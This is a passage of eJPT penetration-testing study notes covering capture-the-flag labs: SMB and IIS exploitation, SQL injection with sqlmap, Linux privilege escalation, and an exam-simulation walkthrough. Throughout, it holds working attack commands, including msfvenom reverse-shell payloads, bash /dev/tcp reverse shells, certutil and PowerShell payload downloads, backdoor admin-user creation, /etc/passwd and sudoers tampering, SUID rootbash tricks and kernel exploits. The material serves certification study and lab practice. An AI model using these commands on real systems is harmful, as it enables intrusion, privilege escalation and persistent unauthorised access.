     │              │                │           │          │
   nmap -sV    smb-vuln-ms17-010  eternalblue   kiwi    autoroute
   nmap -O        Nessus          psexec      hashdump  socks_proxy
                                              john/hashcat  portfwd

Commands to Memorize

🔗 Related Notes

• Zero-to-Hero-eJPT-v2-Exam-Simulation
• 02-Host-Network-Penetration-Testing
• 03-Post-Exploitation
• 📋 Methodology Overview
• CheatSheets/Password Attacks Cheat Sheet

Tags: #ejpt #zero-to-hero #metasploit #meterpreter #eternalblue #pivoting #autoroute #credential-dumping #part1

Zero to Hero eJPT: Part 2 - Windows Manual Exploitation, SMB & PrintSpoofer

Source: OvergrownCarrot1 (Ryan Yager) - Zero to Hero eJPT Playlist (Part 2 of 4)
Video: YouTube
Box: Relevant - TryHackMe
Focus: Manual exploitation (no Metasploit), SMB anonymous access, IIS ASPX reverse shell, SeImpersonatePrivilege → PrintSpoofer

🎯 Key Exam Insights

📌 Video Timestamp Reference

Phase 1: Reconnaissance & Enumeration (0:00-4:45)

Initial Nmap Scan

Copy# Create a project directory (good habit)
mkdir relevant && cd relevant

# Full service scan with default scripts and output
nmap -sV -sC -oA nmap/relevant <TARGET_IP>

Findings:

SMB Vulnerability Scan

Copy# Check for known SMB vulnerabilities (EternalBlue, etc.)
nmap -p445 --script smb-vuln* <TARGET_IP>

Phase 2: SMB Exploitation (4:45-13:58)

Anonymous SMB Access

Copy# List available shares (anonymous/null session)
smbclient -L //<TARGET_IP> -N

# Connect to a specific share anonymously (-N = no password)
smbclient //<TARGET_IP>/nt4wrksv -N

# List contents
ls

# Download files
get passwords.txt

Decoding Discovered Credentials

Copy# passwords.txt contains base64-encoded credentials
cat passwords.txt

# Decode each line
echo "<base64_string>" | base64 -d
# Example output: Bob:!P@$$W0rD!123
# Example output: Bill:Juw4nnaM4n420696969!$$$

Testing Write Permissions on SMB

Copy# Inside smbclient session - test if you can upload files
smbclient //<TARGET_IP>/nt4wrksv -N
put testfile.txt      # if this succeeds, you have write access

# Verify the uploaded file is accessible via the web server
# Browse to: http://<TARGET_IP>:49663/nt4wrksv/testfile.txt

Phase 3: Web Exploitation - ASPX Reverse Shell (13:58-25:35)

Understanding the Target

The web server is IIS on Windows - this means you need an ASPX payload, not PHP. Choosing the wrong payload format is a common mistake.

Staged vs Stageless Payloads (15:48)

Generating the Payload

Copy# Stageless ASPX reverse shell (more reliable)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=1337 -f aspx -o shell.aspx

Upload via SMB + Trigger via Browser

Copy# Upload the shell through the writable SMB share
smbclient //<TARGET_IP>/nt4wrksv -N
put shell.aspx

# Start your listener BEFORE triggering
nc -lvnp 1337

# Trigger the shell by browsing to:
# http://<TARGET_IP>:49663/nt4wrksv/shell.aspx

Result: Reverse shell as iis apppool\defaultapppool - a low-privilege IIS service account.

Phase 4: Privilege Escalation - PrintSpoofer (25:35-34:00)

Checking Privileges

Copy# First thing to check after landing a Windows shell
whoami
# iis apppool\defaultapppool

whoami /priv

Uploading & Running PrintSpoofer

Copy# Upload PrintSpoofer via the same writable SMB share
smbclient //<TARGET_IP>/nt4wrksv -N
put PrintSpoofer64.exe

# In your reverse shell - navigate to the share location and execute
cd C:\inetpub\wwwroot\nt4wrksv
PrintSpoofer64.exe -i -c cmd

Result: NT AUTHORITY\SYSTEM shell.

Alternative Upload Methods

If SMB upload isn't available, transfer files via:

Copy# certutil (from your reverse shell)
certutil -urlcache -f http://<YOUR_IP>:8000/PrintSpoofer64.exe PrintSpoofer64.exe

# PowerShell
powershell -c "Invoke-WebRequest http://<YOUR_IP>:8000/PrintSpoofer64.exe -OutFile PrintSpoofer64.exe -UseBasicParsing"

# Remember to start your web server first:
python3 -m http.server 8000

Phase 5: Post-Exploitation (34:00-45:10)

Retrieving Flags

Copy# Navigate to flag locations (exam tells you exact paths)
type C:\Users\Bob\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt

Creating a Persistent Backdoor User

Copy# Create a new user
net user carrot Password123! /add

# Add to administrators group
net localgroup administrators carrot /add

# Verify
net localgroup administrators

# Attempt to enable RDP for persistent GUI access
# (may fail due to network/firewall restrictions)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

🧠 Key Takeaways

The Full Attack Chain

CopyNmap → Ports 80, 139, 445, 3389, 49663
│
├─ SMB anonymous access
│    smbclient → passwords.txt → base64 decode → creds (dead end for EternalBlue)
│    Discovered: share is WRITABLE + maps to IIS web root on port 49663
│
├─ Web Shell Upload
│    msfvenom → stageless ASPX reverse shell
│    SMB put shell.aspx → browse to http://target:49663/nt4wrksv/shell.aspx
│    → Reverse shell as iis apppool\defaultapppool
│
├─ Privilege Escalation
│    whoami /priv → SeImpersonatePrivilege
│    SMB put PrintSpoofer64.exe → execute → NT AUTHORITY\SYSTEM
│
└─ Post-Exploitation
     Flags retrieved, backdoor user created

Critical Concepts from This Video

🔗 Related Notes

• Zero-to-Hero-Part1-Metasploit-EternalBlue-Pivoting
• Zero-to-Hero-Part4-Linux-Privilege-Escalation
• Zero-to-Hero-eJPT-v2-Exam-Simulation
• Post-Exploitation CTF 2 - INE
• 02-Host-Network-Penetration-Testing
• CheatSheets/Windows Privesc Cheat Sheet

Next in series: Part 3 covers SQL Injection and SQLMap - the web application exploitation component of the eJPT.

Tags: #ejpt #zero-to-hero #windows #smb #iis #aspx #printspoofer #seimpersonate #manual-exploitation #part2

Zero to Hero eJPT: Part 3 - SQL Injection & SQLMap

Source: OvergrownCarrot1 (Ryan Yager) - Zero to Hero eJPT Playlist (Part 3 of 4)
Video: YouTube
Focus: Manual SQL injection, SQLMap automation, header injection, Burp Suite integration, form testing

🎯 Key Exam Insights

📌 Video Timestamp Reference

Phase 1: Reconnaissance (2:18)

Copy# Full port scan - no ping, verbose, fast
nmap -p- -Pn -v -T4 -n <TARGET_IP>

Findings: Port 80 (HTTP web application) and Port 22 (SSH)

Phase 2: Manual SQL Injection (2:50)

Always try manual injection first - it's faster than running SQLMap and confirms the vulnerability exists.

Quick Detection

Copy# In any input field or URL parameter, type a single apostrophe:
'
# If you get an error or the page behaves differently → likely vulnerable

Authentication Bypass Payloads

Copy-- In the username field (password can be anything):
admin' or '1'='1
' or 1=1-- -
admin'--
' or 'a'='a

Phase 3: SQLMap - Automated SQL Injection

The SQLMap Workflow

Copy1. Find injectable parameter (manual test or SQLMap discovery)
2. Enumerate databases (--dbs)
3. Enumerate tables (-D <database> --tables)
4. Dump specific tables (-D <database> -T <table> --dump)
5. Or dump everything (-D <database> --dump)

Step 1: Discover Databases (7:28)

Copy# Initial scan - test URL parameter for injection, enumerate all databases
sqlmap -u 'http://<TARGET>/page.php?id=1' --dbs --level=3 --risk=3 --threads=10

Step 2: Force Database Type (9:12)

Copy# If you already know it's MySQL, skip detection and go faster
sqlmap -u 'http://<TARGET>/page.php?id=1' --dbms=mysql --threads=10 --level=3 --risk=3 --dbs

Step 3: Enumerate Tables (12:30)

Copy# List all tables in a specific database
sqlmap -u 'http://<TARGET>/page.php?id=1' --dbms=mysql -D <database_name> --tables

Step 4: Dump Data (13:06)

Copy# Dump a specific table (e.g., users table for credentials)
sqlmap -u 'http://<TARGET>/page.php?id=1' --dbms=mysql -D <database_name> -T users --dump

# Dump ALL tables in a database (find flags, configs, everything)
sqlmap -u 'http://<TARGET>/page.php?id=1' --dbms=mysql -D <database_name> --dump

Phase 4: Advanced SQLMap Techniques

Header Injection (22:04)

Use case: Some applications log HTTP headers (like X-Forwarded-For) into a database. If the header value isn't sanitized, it's injectable - even when URL parameters are clean.

Copy# Test X-Forwarded-For header for injection
sqlmap -u 'http://<TARGET>/page.php' --headers="X-Forwarded-For: 1" --dbms=mysql --dbs

Burp Suite Request File (39:00)

Use case: Capture a complex request in Burp Suite (with cookies, POST data, custom headers), save it to a file, and feed it to SQLMap. More precise than typing URLs manually.

Copy# In Burp Suite:
# 1. Intercept the request you want to test
# 2. Right-click → "Save item" → save as request.txt

# Feed the saved request to SQLMap
sqlmap -r request.txt --dbms=mysql --dbs

# Enumerate tables from request file
sqlmap -r request.txt --dbms=mysql -D <database_name> --tables

# Dump data from request file
sqlmap -r request.txt --dbms=mysql -D <database_name> --dump

Form Testing (49:30)

Use case: Some pages have forms that SQLMap doesn't detect from the URL alone. The --forms flag tells SQLMap to crawl the page and test every form it finds.

Copy# Explicitly test all forms on a page
sqlmap -u 'http://<TARGET>/login.php' --forms --dbms=mysql --dbs --level=3 --risk=3

Phase 5: Getting an OS Shell (Bonus)

If SQLMap confirms injection with sufficient database privileges, you can escalate from database access to full OS command execution:

Copy# Attempt OS shell via SQL injection
sqlmap -u 'http://<TARGET>/page.php?id=1' --os-shell

# Attempt OS command execution
sqlmap -u 'http://<TARGET>/page.php?id=1' --os-cmd="whoami"

🧠 SQLMap Cheat Card

Essential Flags

SQLMap Decision Flow

CopyFound a web app with input?
│
├─ Test manually: add ' to parameters
│   └─ Error or behavior change? → INJECTABLE
│
├─ Run SQLMap against URL parameter:
│   sqlmap -u 'http://target/page?id=1' --dbs
│   └─ Found databases? → enumerate → dump
│   └─ Nothing? ↓
│
├─ Try header injection:
│   sqlmap -u 'http://target/page' --headers="X-Forwarded-For: 1" --dbs
│   └─ Nothing? ↓
│
├─ Save request in Burp → use -r flag:
│   sqlmap -r request.txt --dbs
│   └─ Nothing? ↓
│
├─ Try --forms flag:
│   sqlmap -u 'http://target/login.php' --forms --dbs
│   └─ Nothing? ↓
│
└─ Increase level and risk:
    sqlmap -u 'http://target/page?id=1' --dbs --level=5 --risk=3

Manual SQLi Quick Reference

🔗 Related Notes

• Zero-to-Hero-Part1-Metasploit-EternalBlue-Pivoting
• Zero-to-Hero-Part2-Windows-SMB-PrintSpoofer
• Zero-to-Hero-Part4-Linux-Privilege-Escalation
• Zero-to-Hero-eJPT-v2-Exam-Simulation
• Web Application Penetration Testing CTF 1 - INE
• 04-Web-Application-Pentesting
• CheatSheets/Web Attacks Cheat Sheet

Tags: #ejpt #zero-to-hero #sqli #sqlmap #web #burpsuite #injection #manual-exploitation #part3

Zero to Hero eJPT: Part 4 - Linux Privilege Escalation

Source: OvergrownCarrot1 (Ryan Yager) - Zero to Hero eJPT Playlist (Part 4 of 4)
Video: YouTube
Focus: 7 different Linux privesc techniques - sudo abuse, SUID, MySQL UDF, shadow/passwd editing, cron jobs, Exim SUID, Dirty Cow kernel exploit
Cert Relevance: eJPT and eCPPT preparation

🎯 Key Exam Insights

📌 Video Timestamp Reference

Linux Privesc Enumeration Checklist

Copy# 1. What can I run as sudo? (FIRST thing to check - often the fastest path)
sudo -l

# 2. SUID binaries - files that run as their owner (usually root)
find / -perm -4000 -type f 2>/dev/null

# 3. Cron jobs - scripts running as root on a schedule
cat /etc/crontab
ls -la /etc/cron*
cat /etc/cron.d/*

# 4. World-writable files - can I edit /etc/shadow or /etc/passwd?
find / -not -type l -perm -o+w 2>/dev/null

# 5. Kernel version - is it vulnerable to known exploits?
uname -r
uname -a

# 6. Automated enumeration (transfer to target first)
./linpeas.sh
./les.sh       # Linux Exploit Suggester

Technique 1: Sudo Binary Exploitation (GTFOBins)

When to use: sudo -l shows you can run specific binaries as root without a password.
Reference: gtfobins.github.io - look up every binary you find.

Check Sudo Permissions (0:31)

Copysudo -l
# Example output:
# (ALL) NOPASSWD: /usr/bin/find
# (ALL) NOPASSWD: /usr/bin/nano
# (ALL) NOPASSWD: /usr/bin/man

Exploit: find (0:45)

Copy# find's -exec flag runs any command - spawn a root shell
sudo find / -exec /bin/sh \; -quit

Exploit: nano (5:23)

Copysudo nano
# Inside nano:
# 1. Press Ctrl+R (read file)
# 2. Press Ctrl+X (execute command)
# 3. Type: reset; sh 1>&0 2>&0
# You now have a root shell inside nano

Exploit: man (7:04)

Copysudo man ls
# Inside the man page viewer (less):
# Type: !/bin/sh
# Press Enter - drops to a root shell

Technique 2: SUID Binary Exploitation (9:05)

When to use: find / -perm -4000 reveals binaries with the SUID bit set - they run as their owner (root) regardless of who executes them.

Copy# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

What to Do with Results

1. Cross-reference every unusual binary with GTFOBins - look under the "SUID" section
2. Check versions of any SUID service binaries (Exim, etc.) - searchsploit for known exploits
3. Analyze custom binaries with strings - look for commands called without full paths (PATH hijacking)

Copy# Analyze a suspicious SUID binary
file <binary>              # what type of file is it?
strings <binary>           # what commands does it call?
ls -la <binary>            # who owns it?

Technique 3: Information Gathering & File Transfers (11:06)

When to use: You need to get enumeration scripts (LinPEAS, Linux Exploit Suggester) onto the target, but wget isn't available.

Copy# Transfer via SCP (if you have SSH credentials)
scp linpeas.sh user@<TARGET>:/home/user/

# Transfer via Python HTTP server + curl (if wget unavailable)
# On attacker:
python3 -m http.server 80
# On target:
curl http://<ATTACKER_IP>/linpeas.sh -o linpeas.sh

# Make executable and run
chmod +x linpeas.sh
./linpeas.sh

Technique 4: MySQL UDF Exploitation (21:31-28:03)

When to use: MySQL is running as root with no password (or weak password). You can create a User Defined Function that executes system commands as root.

Login to MySQL (22:26)

Copy# Try root with no password
mysql -u root

Compile the UDF Exploit (21:31)

Copy# Get the raptor UDF exploit (searchsploit or GitHub)
searchsploit mysql udf
searchsploit -m 1518      # raptor_udf2.c

# Compile as a shared library
gcc -shared -o raptor.so -fPIC raptor.c

Create the UDF and Execute Commands (27:18)

Copy-- Inside MySQL
USE mysql;

-- Create function that calls system commands
CREATE FUNCTION do_system RETURNS INTEGER SONAME 'raptor.so';

-- Create a SUID root bash shell
SELECT do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Get Root (28:03)

Copy# Exit MySQL, then run the SUID bash
exit
/tmp/rootbash -p
# -p flag preserves the effective user ID (root)

id
# uid=0(root)

Technique 5: Modifying /etc/shadow and /etc/passwd (31:05-36:26)

When to use: Misconfigured file permissions allow you to write to /etc/shadow or /etc/passwd. Check with find / -not -type l -perm -o+w 2>/dev/null.

Method A: Read Shadow + Crack Hash (31:05)

Copy# Read shadow file (requires root or misconfigured perms)
cat /etc/shadow

# Save the root hash to a file on your attack machine
echo 'root:$6$hash...' > shadow.txt

# Crack with John (31:31)
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
# Result: password123

# Switch to root with cracked password (36:26)
su - root
# Enter: password123

Method B: Edit /etc/shadow Directly

Copy# Generate a new password hash (SHA-512)
openssl passwd -6 password123
# Output: $6$salt$hash...

# Edit shadow file - replace root's hash
nano /etc/shadow
# Find: root:$6$OLD_HASH:...
# Replace the hash between the first two colons with your generated hash

# Switch to root
su root
# Enter: password123

Method B: Edit /etc/passwd (32:32)

Copy# Change a user's UID to 0 (root)
nano /etc/passwd
# Find your user's line, e.g.: user:x:1000:1000::/home/user:/bin/bash
# Change 1000 to 0:         user:x:0:0::/home/user:/bin/bash

# OR add a new root-level user
# Generate password hash first
openssl passwd -1 password123
# Append to /etc/passwd:
echo 'hacker:$1$hash:0:0::/root:/bin/bash' >> /etc/passwd

# Login as the new root user
su hacker

Technique 6: Cron Job Exploitation - PATH Hijacking (46:33-49:50)

When to use: A cron job runs a script as root, and you can either modify that script OR create a replacement in a directory that appears earlier in PATH.

Identify Cron Jobs (49:50)

Copycat /etc/crontab
# Look for:
# - Scripts running as root
# - The PATH variable at the top (which directories are searched first?)
# - Scripts called WITHOUT full paths

Method A: Overwrite the Script Directly

Copy# If you have write permission to the actual cron script:
echo 'cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash' > /path/to/overwrite.sh
chmod +x /path/to/overwrite.sh

# Wait for cron to execute, then:
/tmp/rootbash -p

Method B: PATH Hijacking (46:33)

Copy# If the crontab PATH lists /home/user BEFORE /usr/bin:
# PATH=/home/user:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

# Create a script with the SAME NAME as the cron job in /home/user
echo '#!/bin/bash' > /home/user/overwrite.sh
echo 'cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash' >> /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh

# Wait for cron to run (check interval in crontab), then:
/tmp/rootbash -p

Technique 7: SUID Service Exploit - Exim (57:38)

When to use: An outdated service binary has the SUID bit set. Find the version, search for exploits, and run them.

Copy# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Output includes: /usr/sbin/exim-4.84-3

# Check version
exim --version
# or: /usr/sbin/exim-4.84-3 --version

# Search for exploits
searchsploit exim 4.8

# Transfer and run the exploit
chmod +x exim-4.80-4.82-local-root.sh
./exim-4.80-4.82-local-root.sh

Technique 8: Kernel Exploitation - Dirty Cow (59:48-1:03:13)

When to use: The kernel is outdated and vulnerable. This is the last resort - kernel exploits can crash the system.

Identify Kernel Vulnerabilities (59:48)

Copy# Check kernel version
uname -r

# Run Linux Exploit Suggester
./les.sh
# Identifies CVEs that match the running kernel

Compile and Run Dirty Cow (1:02:18)

Copy# Transfer the exploit source to the target
# Compile on the target
gcc cowroot.c -o cowroot -pthread

# Execute
./cowroot

# Verify
id
# uid=0(root)

🧠 Privesc Decision Tree

CopyGot a Linux shell? Run these in order:
│
├─ 1. sudo -l
│    └─ Can run something as root? → GTFOBins → ROOT
│
├─ 2. find / -perm -4000 2>/dev/null
│    └─ Unusual SUID binary? → GTFOBins or searchsploit → ROOT
│
├─ 3. find / -not -type l -perm -o+w 2>/dev/null
│    └─ /etc/shadow or /etc/passwd writable? → openssl passwd → edit → su → ROOT
│
├─ 4. cat /etc/crontab + ls /etc/cron.d/
│    └─ Root cron job with writable script? → inject rootbash payload → ROOT
│    └─ PATH hijackable? → create same-name script earlier in PATH → ROOT
│
├─ 5. mysql -u root (no password)
│    └─ MySQL as root? → UDF exploit → ROOT
│
├─ 6. uname -r + ./les.sh
│    └─ Vulnerable kernel? → Dirty Cow / other kernel exploit → ROOT (last resort)
│
└─ 7. ./linpeas.sh
     └─ Catches anything you missed above

Quick Reference: Universal Privesc Payloads

Copy# Rootbash - works for cron jobs, UDF, any "command as root" scenario
cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash
# Then: /tmp/rootbash -p

# Add user to sudoers - works when you can write files as root
echo "<user> ALL=NOPASSWD:ALL" >> /etc/sudoers
# Then: sudo su

# Reverse shell as root - works for cron jobs
bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1

🔗 Related Notes

• Zero-to-Hero-Part1-Metasploit-EternalBlue-Pivoting
• Zero-to-Hero-Part2-Windows-SMB-PrintSpoofer
• Zero-to-Hero-eJPT-v2-Exam-Simulation
• 03-Post-Exploitation
• CheatSheets/Linux Privesc Cheat Sheet

Tags: #ejpt #zero-to-hero #linux #privesc #sudo #suid #gtfobins #cron #kernel #dirtycow #mysql-udf #shadow #part4

Zero to Hero eJPT v2 - Exam Simulation Training

Source: OvergrownCarrot1 (Ryan Yager) - eJPT v2 Training Video
Format: Multi-box walkthrough simulating exam conditions
Boxes Covered: Custom Windows Box, DC-1 (Drupal), Bolt CMS, ICA-1 (qdPM)
Key Insight: Ryan completed the actual eJPT exam in ~3-4 hours. This video recreates that experience.

📌 Video Timestamp Quick Reference

🎯 Critical Exam Environment Notes

Box 1: Custom Windows Box (FTP + SMB + Web)

Reconnaissance

Copy# Create a hosts file with all discovered IPs
echo "192.168.0.40" > host.txt
echo "192.168.0.41" >> host.txt
echo "192.168.0.42" >> host.txt

# Stealthier scan against host list - good starting point (2:48)
nmap -T4 -p- -iL host.txt -oN nmap.txt

# Aggressive full port scan - when speed matters more than stealth (4:45)
nmap -p- -T5 --min-rate 10000 <TARGET_IP>

FTP Exploitation (Port 21)

Copy# Check for anonymous FTP access
ftp <TARGET_IP>
# Try anonymous/anonymous, or brute-force

# If you have write access + FTP maps to IIS web root:
# Generate an ASP reverse shell for IIS/WebDAV upload (7:22)
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f asp > shell.asp

# Upload via FTP
ftp <TARGET_IP>
put shell.asp

# Set up listener
msfconsole -q
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST <YOUR_IP>
set LPORT 4444
run

# Trigger by browsing to the uploaded file

SMB Exploitation (Port 445)

Copy# Brute-force SMB credentials with Metasploit
use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET>
set USER_FILE <userlist>
set PASS_FILE <passlist>
run

# Authenticate via PsExec for SYSTEM shell
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass <password>
set RHOSTS <TARGET>
run

Web Application (Port 8000/8080)

Copy# Directory enumeration with dirb (NOT gobuster - exam doesn't have it)
dirb http://<TARGET>:8080

# Always try default credentials on login pages:
# admin:admin, admin:password, admin:<service_name>

File Transfer to Windows Targets

Copy# Start web server on attack machine
python3 -m http.server 80

# Download via certutil (Command Prompt - most reliable)
certutil -urlcache -f http://<YOUR_IP>/shell.exe shell.exe

# Download via PowerShell (use -UseBasicParsing if IE hasn't been initialized)
powershell -c "Invoke-WebRequest -Uri http://<YOUR_IP>/shell.exe -OutFile shell.exe -UseBasicParsing"

Upgrading Shell to Meterpreter

Copy# Generate a Meterpreter payload
msfvenom -p windows/shell/reverse_tcp LHOST=<YOUR_IP> LPORT=443 -f exe > shell.exe

# Transfer to target, execute, catch with handler
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST eth0     # or use 0.0.0.0 to listen on all interfaces
set LPORT 443
run

# Upgrade to Meterpreter
# Ctrl+Z to background the session
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

# Now interact with Meterpreter session
sessions 2
load kiwi
lsa_dump_sam     # dump NTLM hashes

Credential Dumping & Cracking

Copy# In Meterpreter
load kiwi
lsa_dump_sam

# Save hashes to file
echo "<username>:<hash>" > hash.txt

# Crack with John
john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Crack with hashcat
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt

Box 2: WordPress on Windows (Bolt + WordPress)

Discovery & WordPress Exploitation

Copy# dirb finds /wordpress directory
dirb http://<TARGET>:8080

# WordPress requires hostname - add to /etc/hosts if site redirects
sudo nano /etc/hosts
# Add: 192.168.0.40 carrot.local

# Enumerate WordPress
wpscan --url http://carrot.local/wordpress -e u,vp

# If you have admin creds - edit a theme's 404.php for RCE
# Appearance → Theme Editor → select theme → 404.php
# Replace content with a PHP reverse shell (use a Windows PHP reverse shell!)

Copy# The shell path depends on the active theme
http://<TARGET>/wordpress/wp-content/themes/<theme_name>/404.php

# Set up listener before triggering
nc -lvnp 4444

Box 3: DC-1 (Drupal - Drupalgeddon2)

Exploitation

Copy# Search for Drupal exploits
search drupal

# Drupalgeddon2 - the go-to Drupal exploit
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.0.41
run

Getting a Proper Shell

Copy# From Meterpreter - break out to a bash reverse shell for better control
# Start listener on attack machine
nc -lvnp 4444

# In Meterpreter
shell
bash -c 'bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1'

Upgrade to Full TTY Shell

Copy# Check what's available
which python python3

# Python TTY upgrade
python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation via SUID find

Copy# Search for SUID binaries - two equivalent syntaxes (51:41)
find / -perm -u=s -type f 2>/dev/null      # -u=s syntax (used in video)
find / -perm -4000 -type f 2>/dev/null     # -4000 syntax (same result)

# find has SUID - use GTFOBins escape
find . -exec /bin/sh -p \; -quit

# Verify root
id
cat /root/thefinalflag.txt

Box 4: ICA-1 (qdPM 9.2 - Database Credential Leak)

Reconnaissance

Copynmap -sS -T5 -sV <TARGET>
# Ports: 22 (SSH), 80 (HTTP), 3306 (MySQL)

Web Application - qdPM 9.2

Copy# Browse to http://<TARGET> - identifies qdPM 9.2
# Search for known exploits
searchsploit qdpm 9.2

# qdPM 9.2 has a credential leak vulnerability
# Exploit reveals a database config file (database.yml or similar)

Database Enumeration (55:28)

Copy# Connect to MySQL with credentials from qdPM config leak
mysql -u qdpm_admin -h 192.168.0.42 -p
# Also always try: mysql -u root -h <TARGET> -p (no password)

# Enumerate databases and tables
show databases;
use <database>;
show tables;
select * from users;
select * from login;
select * from staff;

Brute-Force SSH with Discovered Credentials (1:01:42)

Copy# Create user and password files from database dump
echo "smith" > user.txt
echo "lucas" >> user.txt
echo "travis" >> user.txt
echo "dexter" >> user.txt

# Hydra SSH brute-force (1:01:42)
hydra -L user.txt -P pass.txt ssh://<TARGET>

Privilege Escalation - PATH Hijacking

Copy# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Analyze the SUID binary
strings <binary>
# Look for commands called WITHOUT full paths (e.g., "cat" instead of "/bin/cat")

# Create a malicious replacement
cd /tmp
echo '#!/bin/bash' > cat
echo '/bin/bash -p' >> cat
chmod +x cat

# Prepend /tmp to PATH so our fake "cat" runs first
export PATH=/tmp:$PATH

# Execute the SUID binary - it calls "cat" which now spawns a root shell
./<suid_binary>

# Verify
id
# uid=0(root)

🧠 Key Exam Takeaways

Methodology for Every Target

Copy1. nmap -sS -T5 -sV -vv <TARGET> -oN nmap.txt
2. Check each open port:
   - Web (80/8080/443) → dirb, check default creds, identify CMS
   - FTP (21) → anonymous login? brute-force? writable?
   - SMB (445) → smb_login brute-force → psexec
   - SSH (22) → brute-force with discovered creds
   - MySQL (3306) → try root with no password, then brute-force
3. Exploit the weakest entry point
4. Post-exploitation: hashdump, kiwi, look for flags at specified paths
5. Pivot if there are internal networks

Commands You MUST Have Ready

Things That Are NOT on Default Exam Kali

• Gobuster, Feroxbuster, Rustscan
• rlwrap
• evil-winrm
• Sublime Text
• Any custom tools

🔗 Related Notes

• 01-Assessment-Methodologies
• 02-Host-Network-Penetration-Testing
• 03-Post-Exploitation
• 04-Web-Application-Pentesting
• DC-1 Challenge - TryHackMe
• 📋 Methodology Overview

Tags: #ejpt #zero-to-hero #exam-prep #overgrowncarrot1 #walkthrough #windows #drupal #wordpress #privesc

01 - Assessment Methodologies

eJPT Domain 1 - Information Gathering, Footprinting & Scanning, Enumeration, Vulnerability Assessment, Auditing.
Exam Tip: Every engagement starts here. Thorough enumeration = easier exploitation.

Information Gathering

Two phases, always in order: Passive first (no target interaction) → Active second (direct engagement, requires ROE).

Passive Recon Tools

Copywhois <URL>                          # Domain ownership, registrar, nameservers
whois <IP>                           # IP block owner info
host <URL>                           # Resolve hostname → IP
whatweb <URL>                        # Tech stack fingerprinting (CMS, server, frameworks)
dnsrecon -d <domain>                 # DNS enumeration - NS, A, AAAA, MX records
wafw00f <URL> -a                     # Web Application Firewall detection
sublist3r -d <URL> -e google,yahoo   # Subdomain enumeration via search engines
theHarvester -d <domain> -b all      # Email/subdomain harvesting from all sources

# Copy website locally for source code analysis
httrack http://target.ine.local -X "*.bak" -X "*.zip" -X "*.tar.gz"
cd target.ine.local && grep -R -e "FLAG{" -e "FL@G{"

Always check: /robots.txt, /sitemap.xml, /wp-content/uploads, page source (Ctrl+U)

Google Dorks: site: inurl: intitle: filetype: intitle:index of - Reference: exploit-db.com/google-hacking-database

Sites: haveibeenpwned.com (breach checks), dnsdumpster.com (DNS visualization), who.is (WHOIS)

Active Recon - DNS Zone Transfers

Copysudo nano /etc/hosts              # Local DNS override for lab environments
dnsenum <domain>                  # Auto DNS enum + brute-force subdomains
dig axfr @<DNS-server> <domain>   # Zone transfer - dumps ALL records if misconfigured
fierce -dns <url>                 # Lightweight DNS recon, good before Nmap
dirb <URL> <wordlist> -X .zip,.bak,.tar.gz   # Directory brute-force with extensions

Host Discovery & Port Scanning

Host Discovery

Copynmap -sn <IP>/<CIDR>                    # Ping sweep (ARP local, ICMP remote)
nmap -sn <IP>/24 --send-ip              # Force ICMP
nmap -sn -iL targets.txt                # Scan from file
fping -a -g <IP>/<CIDR> 2>/dev/null     # Fast sweep, alive hosts only
netdiscover -r <IP>/<CIDR>              # ARP scan (most reliable local)

Port Scanning

Copynmap <IP>                    # Default - top 1000 TCP ports
nmap -Pn <IP>                # Skip ping - scan even if no ICMP reply (Windows)
nmap -Pn -F <IP>             # Fast - top 100 ports
nmap -Pn -p 80,443,445 <IP> # Specific ports
nmap -Pn -p- <IP>            # All 65535 ports
nmap -Pn -sS -F <IP>         # Stealth SYN - doesn't complete handshake
nmap -Pn -sT <IP>            # Full TCP connect - loud but accurate
nmap -Pn -sU <IP>            # UDP - don't forget SNMP(161), DNS(53), TFTP(69)

Service & OS Detection

Copynmap -T4 -sS -sV -p- <IP>              # Service versions, all ports
nmap -sS -sV -O --osscan-guess <IP>    # Add OS fingerprinting
nmap -sS -A -p- -T4 <IP>              # Aggressive (sV+sC+O+traceroute)
nmap -sS -sV -sC -p- -T4 <IP>         # Default scripts + versions

NSE Scripts

Copyls /usr/share/nmap/scripts/*.nse | grep "SMB"    # Find scripts
nmap --script="smb-enum-*" <IP>                   # Wildcard scripts
nmap -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=rockyou.txt <IP>

Firewall Detection & Evasion

Copynmap -Pn -sA -p 445,3389 <IP>   # ACK scan - detect filtering
nmap -f <IP>                      # Fragment packets (evade IDS)
nmap -n <IP>                      # Skip DNS (faster)

Output & Import

Copynmap -oN out.txt <IP>     # Text    |  nmap -oX out.xml <IP>  # XML (for MSF import)
nmap -oA out <IP>          # All formats at once
db_nmap <flags> <IP>       # Nmap from within MSF (auto-imports)

Enumeration

Copyservice postgresql start && msfconsole
db_import <nmap.xml>       # Import results
hosts / services / vulns   # Query the database

FTP (21)

Copyuse auxiliary/scanner/ftp/ftp_login       # Brute-force
  set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
  set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
use auxiliary/scanner/ftp/anonymous        # Check anonymous access
